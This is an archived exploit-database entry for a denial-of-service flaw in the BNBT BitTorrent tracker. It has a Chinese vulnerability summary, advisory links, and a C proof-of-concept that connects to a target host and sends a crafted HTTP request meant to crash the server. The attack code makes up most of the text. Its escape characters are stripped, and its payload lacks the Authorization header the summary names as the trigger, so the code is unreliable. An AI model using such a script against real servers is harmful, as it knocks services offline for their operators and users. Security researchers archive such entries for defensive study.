https://www.exploit-db.com/exploits/1199
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200405-058

BNBTBitTorrentTracker是一款BT下载服务程序。BNBTBitTorrentTracker对’Authorization:Basic’请求处理不正确，远程攻击者可以利用这个漏洞对BNBT服务器进行拒绝服务攻击。提交包含’Authorization:BasicA==’的特殊HTTPGET请求可导致BNBT服务器崩溃，问题存在于util.cpp文件的Util_DecodeHTTPAuth函数中。

/* BNBT BitTorrent EasyTracker Remote Denial Of Service
   
   Versions:
   Version 7.7r3.2004.10.27 and below
  
   Vendors:
   http://bnbt.go-dedicated.com/
   http://bnbteasytracker.sourceforge.net/
   http://sourceforge.net/projects/bnbtusermods/

   Bug find and coded by:
   Sowhat@@secway@org
   http://secway.org

   This PoC will Crash the server.
 */

#include <winsock2.h>
#include <stdio.h>

#pragma comment(lib, "ws2_32.lib")

char exploit[] = 

"GET /index.htm HTTP/1.0rn:rnrn";

int main(int argc, char *argv[])
{
	WSADATA wsaData;
	WORD wVersionRequested;
	struct hostent  *pTarget;
	struct sockaddr_in 	sock;
	char *target;
	int port,bufsize;
	SOCKET mysocket;
	
	if (argc < 2)
	{
		printf(" ######################################################################rn");
		printf(" #   BNBT BitTorrent EasyTracker DoS by sowhat <sowhat@@secway@org>   #rn", argv[0]);
		printf(" #          This exploit will Crash the Server                        #rn");
		printf(" #               http://www.secway.org                                #rn");		
		printf(" ######################################################################rn");
		printf(" Usage:rn %s <targetip> [targetport] (default is 6969)	rn", argv[0]);
		printf(" Example:rn");
		printf("	%s 1.1.1.1rn",argv[0]);
		printf("	%s 1.1.1.1 8888rn",argv[0]);
		exit(1);
	}

	wVersionRequested = MAKEWORD(1, 1);
	if (WSAStartup(wVersionRequested, &wsaData) < 0) return -1;

	target = argv[1];
	port = 6969;

	if (argc >= 3) port = atoi(argv[2]);
	bufsize = 1024;
	if (argc >= 4) bufsize = atoi(argv[3]);

	mysocket = socket(AF_INET, SOCK_STREAM, 0);
	if(mysocket==INVALID_SOCKET)
	{	
		printf("Socket error!rn");
		exit(1);
	}

	printf("Resolving Hostnames...n");
	if ((pTarget = gethostbyname(target)) == NULL)
	{
		printf("Resolve of %s failedn", argv[1]);
		exit(1);
	}

	memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);
	sock.sin_family = AF_INET;
	sock.sin_port = htons((USHORT)port);

	printf("Connecting...n");
	if ( (connect(mysocket, (struct sockaddr *)&sock, sizeof (sock) )))
	{
		printf("Couldn't connect to host.n");
		exit(1);
	}

	printf("Connected!...n");
	printf("Sending Payload...n");
	if (send(mysocket, exploit, sizeof(exploit)-1, 0) == -1)
	{
		printf("Error Sending the Exploit Payloadrn");
		closesocket(mysocket);
		exit(1);
	}

	printf("Payload has been sent! Check if the webserver is dead.rn");
	closesocket(mysocket);
	WSACleanup();
	return 0;
}

// milw0rm.com [2005-09-06]

来源:XF
名称:bittorrent-http-get-dos(16228)
链接:http://xforce.iss.net/xforce/xfdb/16228
来源:BID
名称:10399
链接:http://www.securityfocus.com/bid/10399
来源:SECUNIA
名称:11684
链接:http://secunia.com/advisories/11684
来源:BUGTRAQ
名称:20040522BNBTBitTorrentTrackerDenialOfService
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=108526361421535&w;=2
来源:fux0r.phathookups.com
链接:http://fux0r.phathookups.com/advisory/sp-x12-advisory.txt
来源:OSVDB
名称:6336
链接:http://www.osvdb.org/6336
来源:SECTRACK
名称:1010254
链接:http://securitytracker.com/id?1010254